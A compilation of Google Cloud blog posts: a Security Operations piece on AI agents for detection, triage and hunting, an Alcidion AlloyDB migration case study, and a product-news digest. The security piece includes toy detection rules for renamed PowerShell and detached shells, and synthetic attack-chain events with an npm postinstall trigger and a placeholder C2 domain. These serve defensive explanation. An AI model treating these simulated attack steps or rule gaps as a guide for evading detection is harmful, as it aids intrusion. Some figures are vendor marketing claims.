Google Security Operations combines compensating controls with proactive security to strengthen operational resilience, and it delivers cross-environment visibility across your entire attack surface through a strategic, three-part approach:

Continuous and autonomous coverage analysis and detection generation
Autonomous investigation, containment, and response
Retroactive hunting

These capabilities are designed to help you see and respond to threats faster than ever before, and we deliver them at machine scale and machine speed. Together with Google AI Threat Defense, we’re able to provide the autonomous platform you need to outpace AI-driven attacks.

1. Continuous and autonomous coverage analysis and detection generation

While proactive defense can identify vulnerabilities before they are exploited, there will be applications that you cannot patch, as well as exposure windows while remediation is still underway.

The 2026 Verizon Data Breach Investigations Report underscores the magnitude of this challenge. In a study encompassing over 13,000 organizations, only 26% of vulnerabilities on the CISA Known Exploited Vulnerabilities (KEV) list had been fully remediated, and the median time to full patching after detection was 43 days. Clearly, you still need continuous monitoring to detect threats in your environments.

Detection Engineering agent. Results for illustrative purposes.

The Detection Engineering agent in Google Security Operations can automatically translate new exploitation patterns of unpatched vulnerabilities into custom detections for your specific environment. Available in preview, it analyzes a diverse array of input sources to quickly and effectively recognize malicious activity, so you can uncover novel attack patterns evolving from new and unpatched vulnerabilities.

The agent’s sources include Google Threat Intelligence (such as emerging threat intelligence, new attack patterns curated by Mandiant, offensive tool repositories, red and purple team reports, autonomous malware analysis, open-source detection repositories, and blogs) and internal security telemetry.

The workflow of the Detection Engineering agent.

To automatically find and fill coverage gaps tailored to your environment, the agent proactively builds new rules and validates them with synthetic events to help ensure your environment is covered before an exploit hits.
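To make the validation step concrete, here is a toy sketch, not the agent's implementation: a candidate rule is replayed against labeled synthetic events and scored on whether it fires on the malicious case and stays quiet on the benign ones. The event fields, the rule, and the scoring scheme are all hypothetical and do not follow the UDM schema.

```python
"""Toy sketch: validate a candidate detection rule against synthetic events.

Event fields, the rule, and the scoring are hypothetical illustrations.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List

Event = Dict[str, str]


@dataclass
class SyntheticCase:
    event: Event
    malicious: bool  # ground-truth label for the synthetic event


def validate_rule(rule: Callable[[Event], bool], cases: List[SyntheticCase]) -> Dict[str, int]:
    """Count hits and misses of a rule against labeled synthetic events."""
    result = {"true_pos": 0, "false_neg": 0, "false_pos": 0, "true_neg": 0}
    for case in cases:
        fired = rule(case.event)
        if case.malicious:
            result["true_pos" if fired else "false_neg"] += 1
        else:
            result["false_pos" if fired else "true_neg"] += 1
    return result


def renamed_powershell(event: Event) -> bool:
    """Hypothetical rule: PowerShell running under a non-standard file name."""
    original = event.get("original_file_name", "").lower()
    image = event.get("process_path", "").lower().rsplit("\\", 1)[-1]
    return original == "powershell.exe" and image != "powershell.exe"


cases = [
    SyntheticCase({"original_file_name": "PowerShell.EXE",
                   "process_path": r"C:\Users\Public\svc.exe"}, True),
    SyntheticCase({"original_file_name": "PowerShell.EXE",
                   "process_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}, False),
    SyntheticCase({"original_file_name": "notepad.exe",
                   "process_path": r"C:\Windows\notepad.exe"}, False),
]

report = validate_rule(renamed_powershell, cases)
print(report)
```

A rule is only promoted when it fires on every malicious synthetic case and on none of the benign ones; in this sketch that means `false_neg` and `false_pos` are both zero.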

2. Autonomous investigation, containment, and response

If a threat is detected, you need to immediately and autonomously assess and respond to protect your environment. By bringing together visibility from cloud and enterprise assets, including endpoints, on-premises firewalls, identity, network, and custom application logs, your security operations center (SOC) can gain the full context of an attack, and unify disparate signals into a complete, actionable narrative the moment an adversary strikes.

The Triage and Investigation agent in Google Security Operations, now generally available, helps analysts drastically reduce time to respond by autonomously investigating alerts, gathering evidence for analysis, and providing verdicts with comprehensive explanations. It can help security analysts automate decision-making, alert closure, and remediation flows, so they can spend more time on high-priority threats instead of false positives.

The agent has already investigated over 5 million alerts, reducing a typical 30-minute manual analysis to 60 seconds with Gemini.

While identifying threats is critical, the ultimate goal is rapid remediation. Agentic automation, available in preview, can help contain attacks by combining dynamic AI agents — which autonomously gather evidence and reason through complex alerts — with deterministic enterprise playbooks.

This hybrid approach ensures that analysts remain in absolute control of critical, high-impact actions while using AI to safely automate decision-making and remediation workflows.
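A minimal sketch of the hybrid pattern, assuming a fixed mapping from an AI verdict to deterministic playbook steps and a hypothetical approval callback for high-impact actions. The action names and impact tiers are invented; this illustrates the control flow only and is not how Google Security Operations implements agentic automation.

```python
"""Toy hybrid containment flow: an AI verdict selects a deterministic
playbook, and high-impact actions wait for analyst approval.

Action names, impact tiers, and the approval callback are hypothetical.
"""
from typing import Callable, Dict, List

# Deterministic playbook: verdict -> ordered list of response actions.
PLAYBOOK: Dict[str, List[str]] = {
    "benign": ["close_alert"],
    "suspicious": ["enrich_indicators", "open_ticket"],
    "malicious": ["enrich_indicators", "isolate_host", "disable_user"],
}

# Actions that never run without a human decision.
HIGH_IMPACT = {"isolate_host", "disable_user"}


def run_playbook(verdict: str, approve: Callable[[str], bool]) -> Dict[str, List[str]]:
    """Run low-impact steps automatically and gate high-impact steps."""
    executed: List[str] = []
    skipped: List[str] = []
    # Unknown verdicts fall back to opening a ticket for a human.
    for action in PLAYBOOK.get(verdict, ["open_ticket"]):
        if action in HIGH_IMPACT and not approve(action):
            skipped.append(action)  # analyst did not approve this step
            continue
        executed.append(action)
    return {"executed": executed, "skipped": skipped}


# Example: the analyst approves host isolation but not account disablement.
outcome = run_playbook("malicious", approve=lambda action: action == "isolate_host")
print(outcome)
```

Keeping the playbook deterministic means the AI only chooses which path to take; it cannot invent new high-impact actions.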

3. Retroactive hunting

Even with autonomous detections and rapid-response handling of active threats, stealthy adversaries and zero-day exploits can sometimes bypass frontline controls. To achieve operational resilience, security teams must also look backward through their data to uncover hidden compromises.

Strong, effective defensive strategies rely on more than just reacting to alerts. The Threat Hunting agent, available in preview, can help teams proactively hunt for novel attack patterns and stealthy adversary behaviors that bypass traditional defenses.

By scouring petabytes of enterprise telemetry (including historical logs) for subtle anomalies, the agent fundamentally shifts the SOC posture from reactive to deeply proactive.

Auditing the Axios supply chain attack

When adversaries can generate unique exploits and command-and-control (C2) infrastructure at zero marginal cost, static indicators like hashes and IPs decay instantly. Defenders must instead detect the behavioral tactics, techniques, and procedures (TTPs) of the attack.

We had the Detection Engineering agent audit our coverage against the recent Axios supply chain attack (UNC1069). The agent mapped the campaign intelligence into behavioral threat detection opportunities (TDOs), simulated the attack chain using high-fidelity synthetic UDM logs, and ran them against active rules.

Google Detection Engineering agent output.

We successfully flagged the execution phases in the middle (renamed PowerShell and macOS background shells), but were blind at the initial entry point (NPM postinstall dropper) and the final C2 exit point.
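The audit logic can be illustrated with a toy replay: one hypothetical synthetic event per stage of the attack chain is run through a hypothetical set of active rules, and any stage where nothing fires is reported as a blind spot. The events and rules are simplified stand-ins, not UDM records or YARA-L, and were chosen to mirror the pattern described above.

```python
"""Toy coverage audit: replay one synthetic event per attack stage through
the active rules and report stages where no rule fires.

Stage names loosely follow the chain described above; events and rules are
hypothetical stand-ins, not UDM logs or YARA-L rules.
"""
from typing import Callable, Dict, List

Event = Dict[str, str]
Rule = Callable[[Event], bool]

# Hypothetical synthetic events, one per stage of the simulated chain.
SIMULATED_CHAIN: Dict[str, Event] = {
    "initial_access": {"parent": "npm", "cmdline": "node setup.js", "trigger": "postinstall"},
    "execution_windows": {"original_name": "powershell.exe", "image": "svc.exe"},
    "execution_macos": {"parent": "launchd", "image": "/bin/zsh", "detached": "true"},
    "command_and_control": {"dest_domain": "example-c2.invalid", "dest_port": "443"},
}

# Hypothetical active rule set that only covers the execution stages.
ACTIVE_RULES: Dict[str, Rule] = {
    "renamed_powershell": lambda e: (
        e.get("original_name") == "powershell.exe" and e.get("image") != "powershell.exe"
    ),
    "detached_macos_shell": lambda e: (
        e.get("image") in {"/bin/sh", "/bin/zsh", "/bin/bash"} and e.get("detached") == "true"
    ),
}


def audit(chain: Dict[str, Event], rules: Dict[str, Rule]) -> Dict[str, List[str]]:
    """Map each stage to the rules that fired on it (empty list = blind spot)."""
    return {stage: [name for name, rule in rules.items() if rule(event)]
            for stage, event in chain.items()}


coverage = audit(SIMULATED_CHAIN, ACTIVE_RULES)
blind_spots = [stage for stage, hits in coverage.items() if not hits]
print(blind_spots)
```

Each blind spot then becomes a target for a new behavioral rule, which can be validated by rerunning the same replay.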

By exposing these blind spots, the agent helped us proactively engineer custom YARA-L rules to close the loop at the first and final steps of the kill chain. You can sign up for the Google Security Operations Detection Engineering agent preview today.

Next steps

By integrating the specialized, Gemini-native agents in Google Security Operations into your workflow, you can autonomously generate detections, orchestrate containment, and hunt for stealthy threats at machine speed. This allows you to maintain a resilient defense even when primary controls fail, ultimately driving a 70% reduction in both breach risk and cost.

Google AI Threat Defense working alongside Google Security Operations can help you consistently outpace automated adversaries. To learn more about how Google AI Threat Defense and Google Security Operations can help you fight AI with AI, check out our Security Talks online event on June 10.

Modernizing Healthcare: How Alcidion achieved greater stability and performance with AlloyDB

Mon, 08 Jun 2026 16:00:00 +0000

In clinical informatics, every second counts. For Alcidion, a global leader in smart health solutions, the mission is simple but critical: use technology to reduce cognitive load for clinicians and present the right information at the right time to save lives.

Whether it’s managing patient flow in an emergency department or ensuring a patient is in the correct ward to avoid adverse outcomes, Alcidion’s flagship platform, Miya Precision, serves as a dynamic intelligent care platform for modern hospitals. To power this mission, the platform recently underwent a major architectural transformation, migrating from a legacy Microsoft SQL Server environment to Google Cloud’s AlloyDB for PostgreSQL.

The challenge: overcoming performance bottlenecks

Operating in an industry where data integrity and uptime are non-negotiable, Alcidion faced several technical and operational hurdles with its previous setup:

Operational overhead: Managing persistent backends for SQL Server required significant manual effort. The team had to manually balance database loads between elastic pools to maintain performance while trying to optimize costs. They also had to constantly manage the gap between allocated and used space to prevent shared pools from being consumed by excessive slack space.
Performance latency: Complex JSON data processing, critical for modern health informatics, was taking up to 30 minutes for certain jobs.
Stability concerns: The team sought a more stable Kubernetes environment and a persistent backend that could scale without constant administrative intervention.

The solution: a smooth migration to AlloyDB

Alcidion used the Database Migration Service (DMS) to move from SQL Server to AlloyDB, achieving a remarkably efficient cutover. The total learning and migration process took under one month, with the core database move completed in only one and a half weeks.

By creating custom synchronization tools and using Google Cloud’s managed services, the team reduced the final transition window to just 15 minutes. Alcidion achieved this by spinning up a new Google Cloud instance synchronized to the active one, with both accessible via unique fully qualified domain names. The new environment remained in read-only mode for customer validation.

During the final cutover, the old instance was set to read-only, synchronization was halted, and external integration links were toggled to the new environment. This streamlined process allowed users to log into the new instance and resume work within minutes, with the primary delay being DNS record updates.

Alcidion chose a fully managed AlloyDB service to eliminate control plane tasks and administrative overhead. This shift allows their engineering team to focus on clinical innovation and product development rather than "managing the container" or the underlying database infrastructure.

Being able to cut over to AlloyDB in about 15 minutes had our users back to work almost immediately. For a system clinicians rely on around the clock, that kind of smooth transition gave Alcidion real confidence.

The results: impact by the numbers

The shift to AlloyDB and Google’s Agentic Data Cloud has delivered immediate, quantifiable improvements for Alcidion and its healthcare customers:

Faster data processing: Data processing that previously relied on SQL Server stored procedures — a process that became increasingly time-consuming as data volumes grew — has been transformed. By migrating to AlloyDB and using BigQuery and Dataflow for processing, Alcidion has seen jobs that once took 30 minutes now complete in just 5 to 60 seconds.
Enhanced stability: The migration has delivered a step-change in reliability. In the previous environment, the team faced monthly disruptions, ranging from failed scheduled maintenance to connectivity issues that required manual intervention. In contrast, AlloyDB and Google Cloud’s compute services have proven exceptionally stable, allowing the team to move away from the "firefighting" mode associated with frequent infrastructure crashes.
Reduced cognitive load: By simplifying their backend and clinical dashboards, Alcidion’s SREs have significantly reduced their administrative burden. This shift has freed the team to focus on high-value innovation, such as refining predictive analytics and generative AI that empower clinicians to make informed clinical decisions faster.

Future vision: AI and beyond

Alcidion isn't stopping at database modernization. The move to AlloyDB is a foundational step for their next phase of growth:

AlloyDB columnar engine: The team is exploring the columnar engine for a second round of query optimization and real-time analytics.
Generative AI apps: Alcidion is actively working with Google to use AlloyDB’s Gemini Enterprise Agent Platform integration to perform concept analysis and pick out critical clinical insights from vast datasets.

By moving to AlloyDB, Alcidion has improved its stability and performance and built a strong foundation to keep delivering smarter, safer care to hospitals worldwide.

Ready to modernize your database? Learn more about how AlloyDB can transform your operational workloads.

What’s new with Google Cloud

Fri, 05 Jun 2026 16:00:00 +0000

Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more.

Tip: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: Google Cloud blog 101: Full list of topics, links, and resources.


Jun 1 - Jun 5

Modeling the physical world with BigQuery Graph
Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this post, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.
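To illustrate the recall use case, here is a toy graph traversal: starting from a contaminated ingredient lot, it follows downstream edges to collect every affected batch, distribution center, and store. The graph, node IDs, and edge labels are hypothetical; in BigQuery Graph you would express this as a graph query rather than Python.

```python
"""Toy digital-twin recall trace: walk downstream edges from a contaminated
ingredient lot to find every affected node.

The graph, node IDs, and edge labels are hypothetical.
"""
from collections import deque
from typing import Dict, List, Set, Tuple

# Adjacency list: node -> list of (edge_label, downstream_node).
EDGES: Dict[str, List[Tuple[str, str]]] = {
    "lot:flour-0425": [("used_in", "batch:B17"), ("used_in", "batch:B18")],
    "batch:B17": [("shipped_to", "dc:north")],
    "batch:B18": [("shipped_to", "dc:north"), ("shipped_to", "dc:south")],
    "dc:north": [("shipped_to", "store:101")],
    "dc:south": [],
    "store:101": [],
}


def affected_nodes(start: str, edges: Dict[str, List[Tuple[str, str]]]) -> Set[str]:
    """Breadth-first search collecting every node reachable from start."""
    seen: Set[str] = set()
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for _label, nxt in edges.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


recall = affected_nodes("lot:flour-0425", EDGES)
print(sorted(recall))
```

Because shared nodes such as `dc:north` are visited once, the traversal stays linear in the number of edges even when many batches converge on the same facilities.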
Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)
Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.

Register for the June 18 Spanish Community TechTalk
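As a rough illustration of token-based quotas, the sketch below enforces a fixed-window budget of model tokens per consumer. The class, limits, and window are hypothetical. It assumes the token count is known before admission (for example, an estimate of prompt tokens), and it does not reflect how Apigee implements its policies.

```python
"""Toy fixed-window token quota for LLM traffic: each consumer may spend at
most `limit` model tokens per window.

Consumer keys, limits, and window length are hypothetical.
"""
from collections import defaultdict
from typing import Dict, Tuple


class TokenQuota:
    def __init__(self, limit: int, window_seconds: int):
        self.limit = limit
        self.window = window_seconds
        # (consumer, window index) -> tokens already used in that window.
        # A production store would also expire keys for old windows.
        self.used: Dict[Tuple[str, int], int] = defaultdict(int)

    def allow(self, consumer: str, tokens: int, now: float) -> bool:
        """Admit the request only if it fits in the consumer's remaining budget."""
        key = (consumer, int(now // self.window))
        if self.used[key] + tokens > self.limit:
            return False
        self.used[key] += tokens
        return True


quota = TokenQuota(limit=1000, window_seconds=60)
print(quota.allow("app-a", 600, now=0))   # True
print(quota.allow("app-a", 500, now=30))  # False: would exceed 1000 in window 0
print(quota.allow("app-a", 500, now=61))  # True: a new window has started
```

Counting tokens rather than requests matters for LLM traffic because a single long prompt can cost as much as hundreds of short ones.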

May 25 - May 29

Anthropic’s Claude Opus 4.8 is now available on Gemini Enterprise Agent Platform. As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and track dependencies over extended sessions.
API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs
Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.

Register now
Securing AI Agents: The Extended Agent Gateway Pattern
Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.

Register for the June 4 Community TechTalk
API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP
Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.

Register for the June 11 Community TechTalk

May 18 - May 22

Chinese Webinar | June 4: AI Command and Control
As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.

Register here
GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases
Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new capabilities to benchmark and debug LLM performance across these devices. Sign up to use these new features in private preview today.

May 11 - May 15

Build Your AI & MCP Control Tower for Universal Governance
Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.

Register for the May 21 Community TechTalk
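To show what tool-level authorization on JSON-RPC traffic can look like, here is a minimal sketch that inspects an MCP `tools/call` request and forwards it only if the caller's allowlist includes the requested tool. The policy table, client IDs, and error code choice are hypothetical; this is not Apigee's policy configuration.

```python
"""Toy fine-grained MCP tool authorization at a gateway.

The policy table and client IDs are hypothetical.
"""
import json
from typing import Dict, Optional, Set

# Hypothetical per-client allowlist of MCP tool names.
TOOL_POLICY: Dict[str, Set[str]] = {
    "support-agent": {"lookup_order", "get_shipping_status"},
    "finance-agent": {"lookup_order", "issue_refund"},
}

# Arbitrary code from JSON-RPC's implementation-defined server-error range.
NOT_PERMITTED = -32001


def check_tool_call(client_id: str, raw_request: str) -> Optional[dict]:
    """Return None to forward the request, or a JSON-RPC error response to deny it."""
    request = json.loads(raw_request)
    if request.get("method") != "tools/call":
        return None  # only tool invocations are gated in this sketch
    tool = (request.get("params") or {}).get("name")
    if tool in TOOL_POLICY.get(client_id, set()):
        return None
    return {
        "jsonrpc": "2.0",
        "id": request.get("id"),
        "error": {"code": NOT_PERMITTED, "message": f"tool {tool!r} not permitted for {client_id}"},
    }


call = json.dumps({
    "jsonrpc": "2.0",
    "id": 7,
    "method": "tools/call",
    "params": {"name": "issue_refund", "arguments": {"order_id": "A-1"}},
})
print(check_tool_call("support-agent", call))  # error response: refund not allowed
print(check_tool_call("finance-agent", call))  # None: forwarded to the MCP server
```

Echoing the request `id` in the error keeps the denial a valid JSON-RPC response, so the calling agent can handle it like any other tool failure.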

Apr 27 - May 1

Master Your Launch: The Apigee Production Go-Live Checklist
Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.

Register for the May 28 Community TechTalk
Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform
Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.

Register for the May 7 Community TechTalk
Fractional G4 VMs are Generally Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
- 1/2 GPU: Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.
- 1/4 GPU: Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.
- 1/8 GPU: Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.
Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI and agentic solutions are robust, secure, and ready for the real world.

Watch the deep dive and read the developer blog to learn more.
ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available
Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
- Install from Marketplace: GoogleCloudTools.workbench-notebooks
- Contribute on GitHub: colab-enterprise-vscode

Apr 20 - Apr 24

Announcing the 2026 Google Cloud Partners of the Year
Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.

See the 2026 Partner Award winners

Apr 13 - Apr 17

We're excited to announce the Public Preview of Datastream’s metadata integration with Knowledge Catalog. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.
Upgrading Apigee OPDK to 4.53 with OS Modernization
Modernize your infrastructure using Google’s official, sequential upgrade path. Our technical expert, Rakesh Talanki, outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition.

Read the guide
Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale
Google Cloud has announced the General Availability of Cloud Run worker pools, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the Cloud Run External Metrics Autoscaler (CREMA). Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.
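Queue-aware autoscaling can be pictured with a small model: size the pool so that each instance handles roughly a target number of backlog messages, then clamp to the configured bounds. This is a simplified sketch of the average-value calculation KEDA relies on (it ignores stabilization windows and tolerances), and the parameter names are hypothetical; CREMA's actual configuration and behavior may differ.

```python
"""Toy model of KEDA-style queue-aware autoscaling.

Parameter names are hypothetical; real autoscalers add stabilization
windows, tolerances, and activation thresholds.
"""
import math


def desired_instances(backlog: int, target_per_instance: int,
                      min_instances: int = 0, max_instances: int = 100) -> int:
    """Instances needed so each handles about target_per_instance messages."""
    if target_per_instance <= 0:
        raise ValueError("target_per_instance must be positive")
    wanted = math.ceil(backlog / target_per_instance) if backlog > 0 else 0
    # Clamp to the configured bounds; min_instances=0 allows scale to zero.
    return max(min_instances, min(max_instances, wanted))


for backlog in (0, 45, 1000, 50_000):
    print(backlog, desired_instances(backlog, target_per_instance=100, max_instances=20))
```

With a target of 100 messages per instance, an empty queue scales the pool to zero, a small backlog still gets one worker, and a burst is capped at the maximum rather than growing without bound.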
Apigee Model Context Protocol (MCP) now Generally Available
Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.

Explore the MCP overview

Apr 6 - Apr 10

Community TechTalk: Powering Retail Agents with ADK, UCP & Apigee X
Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.

Register for the TechTalk
Implement multimodal capabilities in your AI agents
Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see Classify multimodal data. To create a fluid conversational AI that processes audio and video streams in real time, see Enable live bidirectional multimodal streaming. To consolidate fragmented multimodal data into a searchable knowledge graph, see Multimodal GraphRAG resource orchestration.
Automate SecOps workflows with an agentic AI system
To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to orchestrate security operations workflows.

Mar 30 - Apr 3

ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts Shilpi Puri & Wely Lau for a webinar on April 30th at 11:00 AM SGT to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.

Mar 23 - Mar 27

Turn your API sprawl into an agent-ready catalog
As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.

Read the full blog post to get started.
Webinar | April 16: AI Command & Control
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.
Modernizing and Decoupling Event Ingestion with Apigee
In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.

Read the full guide.
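For orientation, this sketch builds the request an HTTP ingestion proxy would forward to the Pub/Sub REST API's `projects.topics.publish` method. The project, topic, payload, and attribute values are hypothetical, and authentication and the actual HTTP call are omitted.

```python
"""Sketch of a Pub/Sub REST publish request (projects.topics.publish).

Project, topic, payload, and attributes are hypothetical; auth is omitted.
"""
import base64
import json
from typing import Dict, Optional, Tuple


def build_publish_request(project: str, topic: str, payload: dict,
                          attributes: Optional[Dict[str, str]] = None) -> Tuple[str, str]:
    """Return (url, json_body) for a single-message publish call."""
    url = f"https://pubsub.googleapis.com/v1/projects/{project}/topics/{topic}:publish"
    # The REST API expects message data as a base64-encoded string.
    data = base64.b64encode(json.dumps(payload).encode("utf-8")).decode("ascii")
    message: Dict[str, object] = {"data": data}
    if attributes:
        message["attributes"] = attributes  # attribute values must be strings
    return url, json.dumps({"messages": [message]})


url, body = build_publish_request("my-project", "orders", {"order_id": "A-1"}, {"source": "apigee"})
print(url)
print(body)
```

Doing the encoding and attribute tagging at the gateway means external clients send plain JSON and never need direct Pub/Sub credentials.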

Mar 16 - Mar 20

Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades
The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.

Explore the full range of what the assistant can do.

Mar 9 - Mar 13

Want to use Gemini to develop code and don't know where to start?
This article includes a couple of examples of developing code with Gemini prompts and identifies the changes needed to get the code working. The article also points to other examples available on GitHub.

Mar 2 - Mar 6

